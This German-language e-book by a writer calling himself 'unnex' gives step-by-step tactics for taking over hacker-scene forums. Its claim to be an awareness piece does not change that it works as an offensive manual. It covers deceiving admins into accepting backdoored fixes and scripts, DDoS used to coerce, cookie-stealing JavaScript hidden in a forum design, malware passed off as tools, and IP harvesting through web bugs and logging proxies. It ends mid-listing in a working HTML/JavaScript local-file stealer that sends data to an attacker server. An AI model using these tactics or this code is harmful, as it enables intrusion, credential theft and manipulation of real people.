Untitled

#########################################################
###Taktiken zum uebernehmen von deutschen Scene-Boards###
####################e-book by unnex######################
#########################################################

Inhalt:

Vorwort

1. Grundwissen
1.1 Software
1.2 Teamanalyse
1.3 Usernamen & IP's
1.4 Vertrauen, Fame, Ressourcen & Kontakte

2. Vorbereitung
2.1 IP's besorgen
2.2 bugs suchen
2.3 Faming
2.4 Board-interessen
2.5 Kontakte knuepfen

3. Angriffs-Taktiken
3.1 der Helfer in der Not
3.1.1 Bug fixen
3.1.2 Botnet o. crashen
3.1.3 Maleware
3.1.4 modding
3.2 biete & suche
3.2.1 tolles Tool
3.2.2 Tutorial als htmldatei
3.2.3 mein Nolog, loggt
3.3 meine Projekte
3.3.1 meine Crew

---

Vorwort:
Dieses E-Book beschreibt Methoden zum Cracken von deutschen Hackerscene-Boards.
Es beschreibt Methoden und Vorgehensweisen sowie wichtige Informationen
die das Hacken eines Scene-Boards moeglich machen. Die hier beschreibenen
Informationen und Angriffs-Taktitken sind von mir selbst
des oefteren erfolgreich eingesetzt wurden. Dieses E-Book bezieht sich NUR
auf Social-engeneering Angriffe.
Wer dieses E-Book liest sollte sich darueber im klaren sein das es zur aufklaerung
der Sicherheitsschwachstellen in deutschen Sceneboards dient. Und es dem zu folge
eine Informationsquelle zur behebung dieser Schwachstellen darstellt.
Es ist also kein Book of dead gegen die Scene. Es ist ein E-Book das den Admins
lediglich Schwachstellen offenlegen soll damit sie diese dann beheben und beachten
koennen. Alle hier beschrieben Angriffs-Taktiken beziehen sich auf Social engneering
und sind somit sehr variierbar einsetzbar.

1. Grundwissen
In den nachsten Unterpunkten werden grundlegende
Informationen ueber Scene-Boards und ihre Struktur
sowie die Teammitglieder und deren eigenschaften
beschrieben.

1.1 Software
Wie der Name schon sagt bestehen "Scene-Boards" aus
Forensoftwares. Hierbei koennte man davon ausgehen
das diese selber programmiert werden. Dem ist aber
nicht so. Ich habe noch nie ein Scene-Board gesehen
das selbst programmiert wurde, und werde wohl auch
nie eins zu Gesicht bekommen. Folglich werden hier
ausnahmslos, mehr oder weniger bekannte, schon existente
Forensysteme, genutzt. zb im deutschen Sprachraum
wird sehr oft auf: smf, vbulletin, wbb, phpbb und mybb
zurrueck gegriffen. In China ist derzeit "discuz"
der Renner usw...
In diesem E-Book moechte ich mich aber auf die deutsche
Scene beschraenken.
Nicht nur die Forensysteme selber sondern auch die
dazugehoerigen Mods und Addons werden nur in den
aller seltensten faellen selbst oder teils selbst
programmiert.

Demnach kann man also davon ausgehen das die Admins
und Teammitglieder der Boards recht wenig ahnung
vom Source ihrer Forensoftware haben.

Zu erklaeren ist dieser Zustand mit mangelnden
programmiererichen Kenntnissen des deutschen
Undergrounds.

Diese Tatsachen wirken jetzt auf den ersten Blick
unwahrscheinlich. Sind aber das ganze Gegenteil
und Bestandteil der moeglichkeiten zum hacken
eines Scene-Boards. Aber dazu spaeter.

1.2 Teamanalyse
In den letzen Jahren hat der Anteil an Cardern
in der Scene einen ueberdimensionalen Zuwachs bekommen.
Was dazu gefuehrt hat das wirkliche Hacker & Programmierer
meist nur noch die Leute sind die schon zum alten Eisen gehoeren.

Das fuehrt uns wiederum zu einer anderen Tatsache.
Die scene besteht zum großteil aus Jugendlichen und halben Kindern.
Somit ist es sehr unwahrscheinlich das ein Board von qualifizierten
und erfahrenen Administratoren geleitet wird. Mitwrikend bei dieser
Tatsache ist auch das viele von den alten Hasen frueher oder spaeter
aus der Scene aussteigen oder einfach White-hat's werden.
Was nicht zuletzt am erschreckend niedrigen Durchschnittsalter
und den dazugehoerigen Verhaltensweisen der Scene'ler liegt.

Also, wenn man ein Scene-Board ownen will ist es wichtig vorerst
das Team unter die Lupe zu nehmen. In den meisten Faellen
wird man auf Juenglinge ohne programmiereriche Kenntnisse stoßen.
Sollte dem nicht so sein dann ist es wichtig die einzelnen Personen
und ihre Eigenschaften und Raenge im Team zu erkennen.
Zb. Wer ist der Coder ? Wer der gfx'er ? Wer gehoert alles zu den
normalen Mods. etc...

1.3 Usernamen & IP's
Im Underground ist es schon fast zum Volksport gewurden mehr als einen
Username zu besitzen. Viele Scene-Mitglieder aendern also staendig oder
speziell fuer verschiedene Projekte ihre Usernamen. Sollte man jetzt also
den Username eines Admins kennen, so ist es wichtig diesen nicht als Dogma
dessen Internet-Identitaet an zu sehen. Dinge wie icq-Nummern, E-Mailaddressen,
Signaturen... koennen dabei helfen noch andere Usernamen der bertroffenen
Personen herraus zu finden. Hierbei ist an zu merken das ein Scene'ler
niemals oder so gut wie nie, nur auf einem Board angemeldet ist.

Ein weiterer Volkssport ist das dauerhafte anonyme Surfen. d.h. viele
nutzen vpn's oder sock's dauerhaft oder zumindest immer wenn sie auf ihrem
Board unterwegs sind. Was uns als Angreifer natuerlich nicht entgegen kommt.
Deshalb ist es wichtig sich nie auf die IP-Adresse des Opfers zu verlassen.
Selbst wenn diese als dynamiche IP ausgezeichnet ist. Denn auch hier ist es
moeglich das der jenige einen Privatrechner infiziert hat und dessen Anbindung
nun als socks nutzt. Man sollte also zum erspaehen der IP des Opfers immer
Methoden nutzen bei denen man sich moeglichst sicher sein kann das man auch seine
real IP bekommt.

1.4 Vertrauen, Fame, Ressourcen & Kontakte
Wie schon erwaehnt ist der Großteil der Scene nicht sehr bewandert was das
Hacken, insbesondere alte und weniger uebliche Hackingmethoden betrifft.
In vielen Faellen ist es also recht einfach diese Leute zu beeindrucken oder
sie von deinem Koennen zu ueberzeugen. Zb. Weist du was eine session fixation ist
oder ein tpl-inject oder eine array function escalation ? Ob du es nun weist oder nicht,
ich kann dir versichern in der Scene wissen es nur die wenigsten bis ueberhaupt niemand.
Solches wissen ist sehr wichtig fuer dich. Damit kannst du zeigen wieviel du weist
und das du mehr weist als Andere. Und dieses wissen kannst du zum festigen deiner Rolle
als richtiger Hacker bestens verwenden.

----------------------------
(groß und kleinschreibung mach ich ma spaeter... XD bin jetzt zu faul das weiter zu korrigieren XD)
----------------------------

der fame an sich ist natuerlich auch eine gute grundlage fuer einen erfolgreichen angriff.
seltsamerweise wird fame oft mit vertrauen gedankt. dein fame in der scene kann also
zu einem maechtigem trumpf bei angriffen auf scene-boards werden. allerdings fuehrt fame
auch zu vielen neidern die sich nicht selten zu richtigen hatern entwickeln.
im grunde ist das auch kein wunder wenn man das alter dieser "hater" und der scene
allgemein betrachtet. sollte man jetzt also versuchen den admin eines boards mittels
fame ein zu wickeln dann ist es einfach nur notwendig darauf zu achten das dieser admin
kein hater des fames ist den du einsetzt.

eine weitere nuetzliche sache ist das vorhandensein der richtigen kontakte und ressourcen.
mit kontakten und ressourcen meine ich kontakt zu den boardadmins und der scene selber
sowie den besitz einiger server zum hosten oder socks zum usen. ebenso etwas wissen
im crashen von servern oder evtl. ein kleines botnet dein eigen nennen.

2. vorbereitung
an diesem punkt werde ich jediglich beschreiben wie man sich einige nuetzliche informationen
beschafft die fuer die verschiedenen angriffstaktiken hilfreich oder sogar notwendig sind.

2.1 ip's besorgen
wie schon gesagt nutzt die scene forensysteme die sie einfach ziehen und hochladen und nach
belieben aufmodden. jeder der ein bisschen erfahrung in sachen hacking hat kann sich
jetzt ausmahlen wie einfach ein spionage angriff auf die ip eines users waere. diese
forensysteme erlauben es grafiken von entferneten server ein zu binden. nutzt man jetzt also
das prinzip des webbugs (zaehlpixel problematik) dann ist es ein kinderspiel die ip
des gegenueber zu ermitteln. wir laden eine grafik auf einen unserer server hoch und haengen
sie uns im forum als signatur an. oder schicken sie im bbcode bei einer privaten nachricht mit.
anschließend sehen wir dann bei uns in die serverlogs und suchen uns raus welche ip wann
unsere grafik aufgerufen hat. diese methode klappt auch bei vielen messanger darunter auch icq 7.
alternativ zu dieser methode kann man das opfer auch dazu bringen es auf einen link klicken
zu lassen um dann dort die ip per serverlogs oder zb php zu loggen.

eine weitere moeglichkeit waere zb. ihm einen sock an zu bieten. wenn er dann versucht den sock
zu usen koennen wir alles fein saeuberlich mitloggen incl. ip.

diese methoden sind natuerlich
nicht die einzigen. wie sich jeder denken kann gibt es zig methoden um an die ip oder die
proxy ip des opfers zu gelangen.

nun ist es aber so das viele sceneuser dauerhaft hinter einem proxy oder aehnlichen sitzen.
hierbei empfehlen sich methoden bei denen man sich moeglichst sicher sein kann die richtige
ip zu bekommen. eine moeglichekeit waere zb. ein angriff auf den router des opfers. natuerlich
kann man die meisten router nicht direkt uebers internet angreifen. und ueber wlan auch nicht
da man nicht weis wo er ist. ebenso kann das wlan des routers sehr gut verschluesselt. ein angriff
uebers internet auf den router des opfers wirkt also geradezu absurt. doch gerade deswegen
ist diese angriffsart fuer uns interessant. niemand wuerde erwarten das ein angreifer aus dem
internet heraus und ohne den opferrechner zu infizieren und ohne das der router aus dem internet
erreichbar ist, im stande ist den router an zu greifen. diese tatsache fuehrt dazu das alle
angriffe die von außen kommen mittlerweile recht gut zu verhindern sind. allerdings wird dabei
das internet vernachlaessigt. viele user fuehlen sich mit ihren macfiltern und wpa2 schluesseln
so sicher das sie nicht daran denken ein ordentliches router passwort zu setzen. die meisten router
haben also die standartlogin daten drinn und als authentifikation ausgewaehlt. wir koennen uns also
per csrf in den router einloggen bzw. unser opfer macht das fuer uns unbewusst. dabei ist es
natuerlich wichtig moeglichst viele routerarten in unser script ein zu binden. also, loggt das opfer
sich jetzt per csrf in den router so koennten wir ueber einen xss bug im router alle infos
die der router hat beschaffen. so unglaublich wie es klingt. aber sehr, sehr viele router-firmwares
haben xss bugs, manche von denen sind sogar nutzbar egal ob jemand eingeloggt ist oder nicht.
ebenso kommt es auch oft vor das man im eingeloggten zustand den router per csrf oder bloßen link
resetten kann u.ae.

2.2 bugs suchen
nein hiermit meine ich keine sqli's oder rfi, tpli usw... wenn wir sowas finden wuerden braeuchten
wir uns keine muehe mehr zu machen diesen text hier weiter zu lesen^^ ich meine bugs bei denen man
sein opfer mehr oder weniger mit einbeziehen muss. also zb. xss, csrf, session fixation, clickjacking...
allerdings beschreibe ich hier den einsatz dieser bugs nicht im herkoemmlichen sinne. wir nutzen
die bugs also nicht aus (in dem sinne wieso sie ueberhaupt bugs sind). sondern wir nutzen sie als
mittel um unsere scheinbare hilfsbereitschaft an zu bieten. aber dazu mehr bei der beschreibung der
einzelnen angriffstaktiken.

das finden solcher bugs ist bei den forensystemen oftmals sehr einfach. es existieren sogar
sehr oft schon bug reports von aktuellen forensystemen die solche bugs behandeln. zb ist mitte
2010 eine xss luecke beim eintragen einer homepage im profil gleich auf mehreren forensystem
vertreten gewesen. darunter vbulletin, smf, phpbb. bei wbb3.0.x gab es ebenfalls eine xss luecke
im userprofil. derzeit muesste wbb3.1.3 die neuste version sein. auch diese enthaelt eine session
fixation die man mit csrf koppeln kann. fuer zb clickjacking sind derzeit so gut wie alle
forensysteme anfaellig. man merkt also das finden solcher bugs ist sehr wahrscheinlich
und diese wahrscheinlichkeit erhoeht sich nicht selten kontinuierlich mit der anzahl an mods
die das board inne hat.

2.3 faming
wie bereits erwaehnt kann fame von großem nutzen sein um das vertrauen des boardadmins zu gewinnen.
haben wir ein paar news in bekannten it-zeitschriften oder blogs oder aenhlichen dingen dann wird
uns des oefteren sehr schnell respekt und vertrauen entgegen gebracht. besonders in verbindung mit
punkt 2.2 ist dieses spezielle vertrauen hilfreich. denn hier bekommen wir einerseits vertrauen
und andererseits techniches wissen zugeschrieben. wenn wir jetzt also einem admin einen bug
reporten dann haben wir sehr hohe chancen beim fixen des bugs selber mitwirken zu koennen.
und dieses selbst mitwirken kann der schluessel zum serverzugriff sein. ebenso vereinfacht
es das unterjubeln von schadsoftware oder schaedlichen links. mit dem vorwand eine besonders gute
exploitseite oder ein besonders gutes hackertool geben zu wollen, haetten wir hier recht gute chancen.

diesen fame kann man natuerlich auch ueber "beeindruckende" taten auf dem board erwirken.
zb wir schreiben ein paar sehr brauchbare tuts und stellen sie ins board oder verschenken
einige brauchbare accounts usw...

ebenso koennten wir uns auch ein paar kontaktpersonen (die zum admin fuehren) zu nutzen machen
um dem admin ammenmaerchen von unseren "superskills" zu unterbreiten.

2.4 board-interessen
gezielt die interessen des boards aus zu nutzen ist ebenfalls eine brauchbare taktik.
vorerst sollte man feststellen was dem board fehlt. bzw was die user brauchen. zb
man laed einen trojaner hoch getarnt als exploitsoftware in der hoffnung der
admin zieht ihn sich und infiziert sich damit. oder man merkt das der admin oder
teammitglieder socks brauchen. wenn sie diese brauchen fallen gleich zwei aspekte ins spektrum.

erstens: man weis nun das sie nicht anonyme im board unterwegs sind und hat leichtes spiel
bei punkt 2.1

zweitens: man gibt ihnen einen socks den man selber verwaltet und loggt ihre userhandlungen mit.
dabei auch die des einloggens in den adminpanel des forums. in der scene weis sowieso keiner wie
unsicher die socks5 verschluesselung wirklich ist!

oder man erfaehrt dass das board ein neues design brauch. man macht eins+spielereien mit javascript
und hinterlaesst in diesen ein paar xss bugs. die uns bei 2.2 natuerlich einen freibrief schenken
wuerden.

oder der admin muss umhosten weil er den server nicht mehr bezahlen kann. wenn ihr ihn dazu bringt,
ihn bei euch hosten zu lassen... ;-)

es gibt also viele interressen die vielseitig ausgenutzt werden koennen.

2.5 kontakte knuepfen
das beschaffen der richtigen kontakte kann von großem nutzen sein um zb. seine autoritaet oder
glaubwuerdigkeit zu festigen. hierbei ist es wichtig, ueber welchen weg auch immer, einen
kontakt zum admin zu bekommen. wuerden wir zb. kontakt zu einem teammitglied bekommen dann koennten
wir dieses nutzen um uns bei dem admin einen namen zu machen.

3. angriffs-taktiken
alle bis jetzt genannten dinge sind wichtig fuer diesen punkt und dienen als fundament fuer
die nachfolgenden angriffs-taktitken.

3.1 der helfer in der not
hierbei erzwingt man bewusst situationen bei denen man den admin seine hilfe anbieten kann
oder vom admin darum gebeten wird.

3.1.1 bug fixen
bei dieser methode ist es wichtig den richtigen fame und die richtigen bugs mit ein zu bringen.
als erstes suchen wir uns den fame. hierzu nehmen wir uns einen hacker der in einigen
scene news erwaehnt wurde. diese identitaet nehmen wir nun an. dabei sollten wir moeglichst
darauf achten das der admin des boards keinen kontakt zu dieser fame-person hat und das diese person
keine kontaktmoeglichkeiten oeffentlich im netz bereit stellt. also moeglichst jemand nehmen
der nur mit username in den news zu finden ist. nun stellen wir uns auf dem board mit unserer
identitaet vor und bringen in unseren vorstellungsthread unsere newseintraege ein und haengen
uns noch ein paar bemerkenswerte programmiereriche faehigkeiten an. dann warten wir erstmal
ein bisschen ab und sehen wie die member auf unsere vorstellung reagieren. rund einen tag warten
und reinschauen. in den meisten faellen werden wir herzlichst begruest und werden sogleich mit
anfaenger fragen uebers hacken und tutanfragen bombadiert. diesen anfragen gehen wir so schnell
wie moeglich nach um unseren status als richtig guter hacker zu festigen. ist das getahen dann suchen
wir einen bug auf dem forum. also wie schon beschrieben in "2.2 bugs suchen". diesen bug reporten
wir dem admin oder coder des boards. beim reporten ist es sehr wichtig viel fachchinesich mit ein zu
bringen und den bug moeglichst kompliziert darzustellen und ihm weitreichende auswirkungen zu zu
schreiben. ebenfalls ist es wichtig den bug so dar zu stellen das es aussieht wie als koennte man
ihn nur schwer fixen. anschließend warten wir die reaktion des gegenueber ab und sehen ob er weis
was zu tuhen ist oder nicht. wenn er es nicht weis bieten wir ihm prompt unsere hilfe an.
wenn er weis was zu tuhen ist. muessen wir schnellstmoeglich gegenargument fuer seine ideen einbringen.
also zb wenn wir ihm einen xss bug reporten und er mein er wird einfach " oder > ausdeclarieren
dann antworten wir ihm das dies nicht ausreichend ist da man zb mit etwas glueck diese zeichen
mit unbekannten zeichen die man davor stellt erzwingen kann. oder das die function die man zum
ausdeclarieren nutzt ja wieder eine array function escalation moeglich machen koennten usw.
haben wir es geschafft dem admin weis zu machen dass das fixen des bugs nicht so einfach ist
wie er denkt dann ist es an der zeit eure hilfe an zu bieten. am besten ihr sagt noch das ihr das
schon ein paar mal gemacht habt und wisst worauf ihr achten muesst. und das bestimmt recht schnell
gehen wird den bug zu fixen. nun stellt sich die frage: in wie weit koennt ihr mitwirken beim fixen
des bugs ? an dieser stelle moechte ich ein paar moegliche varianten beschreiben.

-er gewaehrt euch server zugriff damit ihr den bug fixen koennt.
jetzt ist natuerlich klar was ihr macht. ihr fixed den bug und baut zugleich ein kleines backdoor
in den source ein. achtet darauf das das backdoor moeglichst tief im source versteckt ist
und aus zb. rund 2-3 zeile besteht und variablen namen moeglichst angepasst an andere variablen
im source sind.

-ihr bekommt die betroffene sourcedatei geschickt und sollt sie ihm gefixed geben
damit er sie selber hochladen kann.
wieder fixt ihr den bug baut ein backdoor ein.

-er gibt euch remote zugriff auf seinen rechner und will zusehen wie ihr den code fixt.
das kann ein gewagtes manoever werden aber es ist durchaus machbar. ihr nehmt euch einen
code zum fixen der moeglichst lang ist. am besten so lang das niemand lust haette
diesen nochmal zu untersuchen. diesen kopiert ihr im dann in seine phpdatei. in euren
fix code habt ihr natuerlich wiederum ein kleines backdoor eingebaut. es kann auch nicht
schaden den code ueber die ganze datei auf zu teilen und das fixen bei dem der admin zusieht
sehr schnell von statten gehen zu lassen. so das der admin schon beim sehen sichtlich
uebefordert wird.

sollte der seltene fall auftreten und euer opfer fixed den bug selber dann ist es wichtig
einen neuen zu finden. bzw die von euch genannten gegenargumente auf seinen fix wirken zu lassen.
in den meisten faellen klappt das auch und ihr koennt ihm beweisen das er den bug nicht selber
fixen kann. in diesem fall habt ich dann hoechstwahrscheinlich eine der drei so eben genannten
varianten zur auswahl. habt ihr es dann geschafft dem source euren abckdoor unter zu jubeln,
dann muesst ihr nur noch warten bis keiner mehr vom team auf dem board online ist. also moeglich
mitten in der nacht. dann koennt ihr in aller ruhe euer backdoor nutzen und den server uebernehmen.

3.1.2 botnet o. crashen
bei dieser methode sind wir vor allem auf unsere ressourcen angewiesen. es geht zwar auch ohne, und wie
es ohne geht, beschreibe ich auch. aber man wird merken, die methode ohne ressourcen ist wahrscheinlich
weniger erfolgreich. vorerst wie es ohne ressourcen geht:

wir melden uns wieder auf dem betroffenen forum an und stellen uns vor. dabei merken wir an
das wir ueber ein sehr gutes wissen und sehr viel erfahrung im absichern von servern gegen ddos
und aehnliche angriffe haben. wenn uns die ersten member "hallo" gesagt haben und wir halbwegs zur
kenntniss genommen wurden, kanns auch schon los gehen. wir suchen uns einen bug in der serversoftware
und bringen den server zum absturz. also einen dos bug oder memory corruption usw...
gelingt uns das, also das wir einen bug finden, dann legen wir das board vortan jedesmal lahm wenn
teammember oder der admin selber online ist. es wird nur wenige tage oder vllt. auch nur stunden dauern
bis den boardbetreibern dieser zustand gehoerig auf die nerven geht. folglich werden sie versuchen
etwas gegen das problem vor zu gehen. jetzt gibt es mehrere moeglichkeit. behebt das team tatsaechlich
diese bugs dann ist schicht im schacht fuer diese methode. sollten sie es nicht beheben koennen
dann sind sie logischerweise auf hilfe angewiesen. wenn du glueck hast kommen die admins
aufgrund deines vorstellungsthreads selbst auf dich. sollte dem nicht so sein, dann ist jetzt schnelles
handeln gefragt. wir kontaktieren den admin und teilen ihm unser bedauern ueber den zustand des boards
mit und schlagen ihm vor den server zu sichern. unseren vorstellungsthread erwaehnen wir dabei auch
um ein bisschen glaubwuerdigkeit mit ins spiel zu bringen. der admin wird uns vorerst kein vertrauen
schenken. also crashen wir weiter seinen server. diesesmal aber nonstop sobald wir die antwort vom
admin erhalten haben in der zum ausdruck kommt das er unsere hilfe nicht annimmt. wenn wir der meinung
sind das wir ihm genug auf den zeiger gegangen sind dann schreiben wir ihn wieder an und bieten ihm
eine sofortloesung an. also wir bieten ihm ein server script an das ein backdoor enthaelt.
um den admin weiter ein zu wickeln merken wir an das wir doch so gerne auf diesem board unterwegs
sind und alles moegliche machen moechten um es wieder online zu bekommen. des weiteren bitten wir
ihn darum es doch wenigstens mal fuer kurze zeit zu probieren. und wenn es nicht klappt kann er es
ja wieder runter hauen. mit etwas glueck nimmt er diesesmal unser angebot an. nun muessen wir nur noch
eine kurze zeit warten zb. eine stunde, und dann stoppen wir unseren angriff auf das board.
was nun passiert ist klar. wir schreiben den admin an und belatschern ihn permanent, wie toll
es doch ist dass das script funktioniert. diese aktion soll uns zeit verschaffen bzw den admin
mit uns beschaeftigen damit wir zeitgleich unseren backdoor ausnutzen koennen bevor der admin das
script evtl. wieder loescht. sollte der admin diesen vorschlag nicht annehmen und unser script
nicht nutzen wollen dann geben wir ihm einen tip der an die servereinstellungen gebunden ist.
also zb logs ausschlaten, mit der aberwitzigen begruendung das man den prozess des loggens damit
unterbindet und somit das script weniger zu tuhen hat und weniger schnell ueberastet werden kann usw...
frueher oder spaeter wird er so etwas ausprobieren, was wir ihm vorschlagen. wenn das geschieht
dann stoppen wir unsere crash angriffe und vernehmen die danksagung des admins, das unser tip
geholfen hat. nun warten wir eine ganze weile zb. eine woche. dann greifen wir wieder an.
und wieder bieten wir unsere hilfe an. diesesmal aber mit der begruendung das bei diesem angriff
mehr gemacht werden muss. wir haben dem admin schon einmal geholfen. diesesmal wird er unser
serverscript wohl eher annehmen. und wenn er das macht dann haben wir es, wie schon gesagt, geschafft
und koennen den server uebernehmen.

nun zur vorgehensweise mit ressourcen.
natuerlich kann es vorkommen das man den betroffenen server nicht so einfach crashn oder dosen kann.
in diesem fall muessen wir mit unverhinderbaren mitteln rann. also zb. ein richtig großes botnet.
wir legen das board erstmal fuer ein paar tage oder stunden lahm. dann schreiben wir den admin
an und fragen ob er nicht einen besseren server haben will. einen den wir sponsern wuerden.
im grunde ist es meist nur eine frage der zeit. also wir ddosn so lange bis der admin auf unser
angebot eingeht. sollte er auf einen anderen server wechseln der nicht zu uns gehoert, dann ddosn
wir auch diesen server. also, wenn es soweit ist und er unseren vorschlag annimmt dann muessen
wir nichts weiter machen als zu warten bis er treudoof seine backups und daten auf unseren
server hochlaed, wo wir sie dann in aller ruhe einsehen koennen. wichtig bei dieser methode
ist natuerlich das wir bei unserer vorstellung im forum betonen das wir im besitz verdammt guter
server sind.

3.1.3 maleware
diese methode erfordert besonders viel geschick weil es hier von noeten ist mehrere rollen zu spielen
die sehr gut aufeinander abgestimmt sein muessen. des weiteren ist diese methode recht langwierig.
zu erst legen wir uns ein paar accounts auf seinem board an.
dann besorgen wir uns die ip des admins. danach forschen wir ein bisschen nach. wir brauchen
ein paar usernamen oder andere internet-addressen auf denen der admin angemeldet ist.
wenn wir moeglichst viel informationen ueber diese person haben dann schreiben wir ihn an. das machen
wir aufbrausend und leicht gereizt. also wir schreiben ihn in etwa so an:
du: na, xxx AKA xxxx und AKA xxxxx. ich hab deine ip 000.00.00.0! und die werden die bullen bekommen ;-)
(wichtig dabei ist das wir auch wirklich seine real ip haben.)
der admin wird versuchen sich nichts anmerken zu lassen, und macht einen auf dicke hose und
das es ihn angeblich nicht interessiert. an dieser stelle verdeutlichen wir ihm das er angeblich
einen trojaner von uns auf seinem system hat. das machen wir indem wir seine ip ddosn.
wir warten nun bis er wieder online ist. wenn er wieder da ist erzaehlen wir ihm folgendes:
du: na soll ich nochma machen ? scan mal dein sys du noob. aber egal, in rund 8 tagen kommen die cops ;-)
nachdem wir das gesagt haben verschwinden wir einfach ohne weitere worte.
jetzt lassen wir dem admin ein paar tage zeit. nach 1-2 tagen schreiben wir ihn von unseren board
accounts an. und erzaehlen ihm das wir gehackt wurden. jeder account sollte dabei einzeln
richtig am rummheulen sein das er von den bullen hochgenommen wurde. dabei muss mindestens ein account
genutzt werden um dem admin eine info zu entreißen die wir schon wissen. wir muessen ihn dazu bringen
das er uns sagt das er von dem angreifer angeschrieben wurde.
nun sollte dem admin langsam bange werden und er kommt ins gruebeln. wir warten wieder einen tag.
dann nehmen wir uns einen unserer foren accounts und schreiben ins forum das alle aufpassen
sollen und nachsehen sollen ob sie infected sind. mit den anderen accs schreiben wir rein
das wir infected sind. wir warten wieder einen tag. dann schreiben wir den admin an und erzaehlen
ihm das wir den trojaner auf unserem system gefunden haben und eine software haben mit der man ihn
aufspuehren kann. wenn wir bis jetzt gut gearbeitet haben und dem admin genug angst gemacht haben
wird er unsere maleware annehmen und wir haben ihn trojanert.

3.1.4 modding
hier ist es wichtig die richtigen interessen des boards zu erfahren. ich auf nur eine
moeglichekit eingehen. also, sollte das board ein neues design brauchen:
wir melden uns auf dem board an und prahlen mit unseren tollen designer skills. mit in den
vorstellungsthread bringen wir ein paar 0815 designs ein. die allerdings fuer ein anderes
forensystem sind. dann schreiben wir den admin an und schlagen ihm vor ein design, ein richtig
gutes design fuer sein board zu machen. er wird diesen vorschlag nicht ablehnen. weil ein design
ja eigentlich nicht schaden kann und er schlussendlich immernoch nein sagen kann. nebenbei
machen wir uns weitere foren accounts und erzaehlen von diesen aus, das uns das alte design nicht
gefaellt. nun ist es an der zeit unsere rolle als helfer einen sinn zu geben. wir fragen den admin
ob es moeglich waere das wir nachdem neuen design zum gfxer oder aehnlichen ernannt werden.
der admin wird dieses ganze geschehen wahrscheinlich nur als probesache aufnehmen. wir basteln
jetzt also das design. und erklaeren das wir uns sehr viel muehe gegeben haben und sogar javascript
fenster und handlungen fuer tolle effekte mit reingebracht haben. (dem sollte auch wirklich so sein!)
und jetzt kommt der ausschlag gebende punkt. der admin wird nicht darauf achten das javascript
gefaehrlicher sein kann als man denkt. wir geben ihm also screens aus dem localmode wo wir
das design am laufen haben und ueberreden ihn es auf seinem board zu nutzen. was der admin
dabei uebersieht, ist die gefahr die von unserem javascript code ausgeht. denn in diesen
code basteln wir einen cookielogger ein. am besten versteckt als iframe. also, location.href+cookie
und das in nen iframe und verstecken. das sollte reichen. wenn der admin jetzt dieses design
aufs forum knallt werden die cookies der user permanent auf einen unserer server eubertragen.
so unglaublich wie es klingt. aber nur die wenigstens bis ueberhaupt niemand sieht sich 100kb js
dateien die einzeilig sind an, und findet xss backdoors. diese methode ist also unter umstaenden
eine sehr efektive wahl.

3.2 biete & suche
diese methoden beziehen sich auf das oeffentliche einbringen von tools und aehnlichen dingen ins board.
also, wir bieten im forum kostenlos tools und tuts an.

3.2.1 tolles tool
zu dieser methode brauch ich wohl nicht viel zu sagen. weil sie ohnehin abgedrochen und nur noch selten
mit erfolg gekroent ist. wir brauchen ein paar foren accounts und fud
maleware. diese maleware bieten wir im forum kostenlos an und erklaeren mit den anderen accounts
wie toll dieses programm doch funzt und wie hilfreich es ist. wenn wir glueck haben dann
wird auch der admin versuchen unsere maleware zu nutzen. und somit haetten wir ihn als victim in unserer
trojanerliste.

3.2.2 tutorial als htmldatei
bei deiser methode nutzen wir wieder die unwissenheit des admins aus. zu erst erstellen wir einen
forenaccount und posten ein paar normalen .txt tutorials. wenn wir genug davon gepostet haben und
wir sehen das diese auch gelsen werden dann koennen wir ein tutorial reinstellen das nur als
.html datei verfuegbar ist. bei dieser art von datei wird niemand verdacht schoepfen. besonders
nicht die deutschen scene'ler XD vorweg brauchen wir allerdings eine wichtig inforamtion:
wo speichert das opfer die serverdaten ? diese beschaffen wir uns folgendermaßen: wir bringen
den admin dazu mit uns eine remote-desktop session ein zu gehen. also zb mikogo, teamviewer, vnc... etc.
gruende dafuer gibt es viele. wir koennten uns zb die handhabung eines  bestimmten programms zeigen
lassen oder einfach begeistert fragen ob wir bei einem hack zusehen duerfen usw.
haben wir einen grund gefunden und sind verbunden mit unserem victim dann praegen wir uns
jede datei die wir sehen ganz genau ein. die meisten leute haben dateien wie "serverdats.txt" oder
aehnliches auf dem desktop. also, wir achten auf jede datei! wenn wir eine datei sehen die, die
serverdaten enthalten koennte dann haben wir vorerst genug informationen. also zb wir sehen die datei
"root.txt" auf dem desktop. als unser opfer auf "start" gedrueckt hat in der taskleiste, haben wir den
username gesehen, der zb bei windows in diesem programmfenster verzeichnet ist. also: server.txt auf dem
desktop und username ist "ichuser" der pfad zu datei waere dann zb:
C:\Dokumente und Einstellungen\ichuser\Desktop\root.txt
web: file:///C:/Dokumente%20und%20Einstellungen/ichuser/Desktop/root.txt
jedenfalls sofern der user auf c used. wenn nicht muessten wir das aber auch spitz kriegen
in unserer desktop session. nun koennen wir unser tutorial erstellen. zwischen viel und damit meine
ich wirklich richtig viel text verstecken wir einen file stealer. ich denke mal sogut wie niemand hat
bis jetzt von html file stealen gehoert. also nehme ich einen code den ich selber mal verfasst hatte.
im grunde koennte es sogar sein das diese idee von mir stammt XD weis aber nich ob schonmal
jemand drauf gekommen is XD
---
---html file stealer by unnex---

#########sender.html#########

<html><head>
<title>html stealer</title>
<script type="text/javascript">
var first = "yes";

function uebernahme(dat) {
if(browsertyp == "IE" && first == "no" && dat!=undefined) {
document.x.textausgabe.value+="\n";
location.href="http://[server]/annahme.php?log="+escape(document.x.textausgabe.value);
}
if(dat!=undefined){
document.x.textausgabe.value+=dat;

location.href="http://[server]/annahme.php?log="+escape(document.x.textausgabe.value);
first="no";
}
}

function read(file) {
var source = "";
if(browsertyp != "IE") {
var url = new java.net.URL(new java.net.URL(window.location.href), file);
var stream = new java.io.DataInputStream(url.openStream());
var line = "";
while ((line = stream.readLine()) != null) {
if(first=="yes") {
source += line;
first="no";
} else {
source += "\n" + line;
}
}
stream.close();
} else {
source = dwn.startDownload(file,uebernahme);
}
return source;
}
</script>
</head>

<body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
<script type="text/javascript">
var browsertyp;
if(!navigator.language || document.defaultCharset) {
browsertyp='IE';
document.write('none download');
} else {
browsertyp='MO';
}
</script>
<form name="x" action="javascript:uebernahme(read(document.x.textfile.value))">
<p><input type="text" name="textfile" value="file:///[local-file]" size="20">
<input type="submit" name="run" value="Datei einlesen"></p>
<p><textarea name="textausgabe" rows="5" cols="15"></textarea></p>
</form><script>document.forms[0].submit()</script>
</body>
</html>

#########annahme.php#########

<?php
if (isset($_GET["log"])) { echo $_GET["log"];
if (file_exists("[logfile]")) {
$filename="[logfile]";
$fp = fopen($filename,'a');
